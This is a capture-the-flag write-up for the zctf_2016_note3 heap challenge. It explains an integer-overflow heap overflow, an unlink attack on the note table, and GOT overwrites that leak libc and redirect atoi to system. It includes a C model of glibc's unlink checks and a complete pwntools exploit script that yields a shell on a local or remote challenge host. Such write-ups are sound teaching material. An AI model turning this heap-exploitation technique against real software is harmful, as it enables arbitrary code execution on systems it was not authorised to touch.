A typical unlink challenge. The bug is an integer overflow: the loop counter i is an unsigned long, so once the bound reaches -1 (here by requesting a note of size 0, so that size - 1 wraps) it becomes huge and the read runs past the chunk, giving a heap overflow. One could use unlink to leak the libc base and then a fastbin attack on __malloc_hook, but since the edit function allows writing repeatedly, it is much simpler than that.
First allocate 4 chunks.
Then use unlink to redirect a note pointer into the .bss note table.
For unlink to pass the glibc check (fd->bk == P && bk->fd == P), the fake chunk's fd and bk must point back at itself through the pointer slot p that stores its address (0x6020c8 here), i.e. they are fixed values:
fake chunk
fd = &p - 0x18
bk = &p - 0x10
Also take care of the next chunk's prev_size (the distance back to the fake chunk, 0xb0 here) and its size field: the PREV_INUSE bit must be cleared so free() consolidates backwards and calls unlink on the fake chunk.
Once the note table is under control, overwrite free@got with puts@plt, point the second note at atoi@got and free it to leak atoi, then write system over atoi@got; sending "/bin/sh" to the menu then calls system("/bin/sh") and gives a shell.
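The fake chunk layout above is easiest to verify by replaying glibc's unlink logic on a model of the heap and the .bss note table. The following C program is an added example, not code from the original writeup or the challenge binary: it re-implements the unlink() check (the fd->bk / bk->fd check of glibc 2.23 plus the size-vs-prev_size check added in 2.26) and the backward-consolidation step of _int_free(), then runs the two payloads from the exploit against constructed heap and .bss buffers. The buffer sizes, the 0x18 offset of the note table inside the modelled .bss, and the function names are assumptions made for the model; the chunk sizes (0xa0 / 0x20 / 0xa0) and the fake chunk values (size 0xb1, fd = &p-0x18, bk = &p-0x10, prev_size 0xb0) are the ones the exploit uses.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* 64-bit glibc malloc_chunk header. */
typedef struct chunk {
    uint64_t prev_size;
    uint64_t size;
    struct chunk *fd;
    struct chunk *bk;
} chunk_t;

#define PREV_INUSE    1
#define CHUNKSIZE(p)  ((p)->size & ~(uint64_t)7)
#define NEXT_CHUNK(p) ((chunk_t *)((uint8_t *)(p) + CHUNKSIZE(p)))

/* Model of glibc's unlink(): returns 0 on success, -1 where glibc would abort with
 * "corrupted size vs. prev_size" (2.26+) or "corrupted double-linked list" (2.23+). */
static int unlink_chunk(chunk_t *p)
{
    chunk_t *fd = p->fd, *bk = p->bk;
    if (CHUNKSIZE(p) != NEXT_CHUNK(p)->prev_size)
        return -1;
    if (fd->bk != p || bk->fd != p)
        return -1;
    fd->bk = bk;   /* (&p-0x18)->bk is p itself: p = &p-0x10 */
    bk->fd = fd;   /* (&p-0x10)->fd is p itself: p = &p-0x18, the value that survives */
    return 0;
}

/* Backward-consolidation step of _int_free() for a non-fastbin chunk.
 * Returns 1 when nothing is merged (PREV_INUSE still set), else unlink's result. */
static int free_consolidate_backward(chunk_t *p)
{
    if (p->size & PREV_INUSE)
        return 1;
    chunk_t *prev = (chunk_t *)((uint8_t *)p - p->prev_size);
    return unlink_chunk(prev);
}

/* Constructed model of .bss: the note table sits 0x18 bytes in (like 0x6020c8 in the
 * binary) so that the fake fd/bk, which point 0x18/0x10 below it, are still addressable. */
static uint64_t bss[0x10];
#define NOTES ((void **)(bss + 3))

/* Constructed model of the heap: chunk0 (0xa0), chunk1 (0x20), chunk2 (0xa0), then top. */
static uint64_t heap[0x40];
#define CHUNK(off) ((chunk_t *)((uint8_t *)heap + (off)))

static void setup(void)
{
    memset(bss, 0, sizeof bss);
    memset(heap, 0, sizeof heap);
    CHUNK(0x00)->size = 0xa0 | PREV_INUSE;
    CHUNK(0xa0)->size = 0x20 | PREV_INUSE;
    CHUNK(0xc0)->size = 0xa0 | PREV_INUSE;
    NOTES[0] = (uint8_t *)heap + 0x10;   /* user pointers, as stored in the note table */
    NOTES[1] = (uint8_t *)heap + 0xb0;
    NOTES[2] = (uint8_t *)heap + 0xd0;
}

/* Replays the attack. fd_off/bk_off are the byte distances below &notes[0] used for the
 * fake fd/bk (0x18/0x10 are the working values); keep_prev_inuse leaves the bit set in
 * chunk2's size, as a careless overflow payload would. Returns free's unlink result. */
static int run_unlink_attack(size_t fd_off, size_t bk_off, int keep_prev_inuse)
{
    setup();
    /* Payload 1 (written into note 0): fake chunk at chunk0+0x10. */
    chunk_t *fake = (chunk_t *)NOTES[0];
    fake->prev_size = 0;
    fake->size = 0xb0 | PREV_INUSE;                      /* 0xb1 */
    fake->fd = (chunk_t *)((uint8_t *)NOTES - fd_off);
    fake->bk = (chunk_t *)((uint8_t *)NOTES - bk_off);
    /* Payload 2 (overflow from note 1, allocated with size 0): chunk2's header. */
    CHUNK(0xc0)->prev_size = 0xb0;                       /* distance back to the fake chunk */
    CHUNK(0xc0)->size = 0xa0 | (keep_prev_inuse ? PREV_INUSE : 0);
    /* delete(2) -> free(note 2) */
    return free_consolidate_backward(CHUNK(0xc0));
}

/* After a successful unlink, note 0 points at &notes[0]-0x18 inside .bss. */
static int note0_hijacked(void)
{
    return NOTES[0] == (void *)((uint8_t *)NOTES - 0x18);
}
```

Running run_unlink_attack(0x18, 0x10, 0) leaves note 0 pointing 0x18 bytes below the note table, which is exactly why the later edit(0, ...) in the exploit can rewrite the table entries themselves; any other fd/bk offsets fail the fd->bk / bk->fd check, and leaving PREV_INUSE set means free() never reaches unlink at all.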
exp:
#!/usr/bin/python2
from pwn import *
local=1
if local==1:
    p=process('../binary/zctf_2016_note3')
    elf=ELF('../binary/zctf_2016_note3')
    libc=elf.libc
else:
    p=remote('node3.buuoj.cn',28100)
    elf=ELF('../binary/zctf_2016_note3')
    libc=elf.libc  # for the remote target load the libc the service actually runs instead
def add(size,content):
    p.sendlineafter('>>\n','1')
    p.sendlineafter('1024)\n',str(size))
    p.sendlineafter('content:\n',content)
def show():
    p.sendlineafter('>>\n','2')
def edit(idx,content):
    p.sendlineafter('>>\n','3')
    p.sendlineafter('note:\n',str(idx))
    p.sendlineafter('content:\n',content)
def delete(idx):
    p.sendlineafter('>>\n','4')
    p.sendlineafter('note:',str(idx))
lg=lambda name,data:log.success('%s: '%(name)+hex(data))
def exp():
    # fake chunk inside note 0: prev_size 0, size 0xb1, fd=&p-0x18, bk=&p-0x10 (p = 0x6020c8, the slot holding note 0)
    payload=p64(0)+p64(0xb1)+p64(0x6020c8-0x18)+p64(0x6020c8-0x10)
    add(0x90,payload) #0, chunk size 0xa0
    add(0x0,'bbbb')   #1, chunk size 0x20
    add(0x90,'cccc')  #2, chunk size 0xa0
    add(0x18,'dddd')  #3
    delete(1)
    # re-take chunk 1 with size 0: size-1 wraps, so the read overflows into chunk 2's header
    # prev_size=0xb0 (distance back to the fake chunk), size=0xa0 with PREV_INUSE cleared
    payload=p64(0)*2+p64(0xb0)+p64(0xa0)
    add(0,payload)
    delete(2)  # backward consolidation unlinks the fake chunk: note[0] = 0x6020c8-0x18
    # note[0] now points into the note table itself, so edit(0) rewrites the table:
    # note[0]=free@got, note[1]=atoi@got, note[3]=atoi@got
    edit(0,p64(0)*2+p64(elf.got['free'])*2+p64(elf.got['atoi'])+p64(0)+p64(elf.got['atoi']))
    show()  # menu option 2, kept from the original script
    edit(0,p64(elf.plt['puts'])[:-1])  # free@got -> puts@plt
    delete(1)  # free(atoi@got) is now puts(atoi@got): leaks atoi
    atoi=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
    libcbase=atoi-libc.sym['atoi']
    lg('libcbase',libcbase)
    system=libcbase+libc.sym['system']
    edit(3,p64(system)[:-1])  # atoi@got -> system
    p.sendline('/bin/sh\x00')  # the menu's atoi(choice) becomes system("/bin/sh")
    p.interactive()
if __name__=="__main__":
    exp()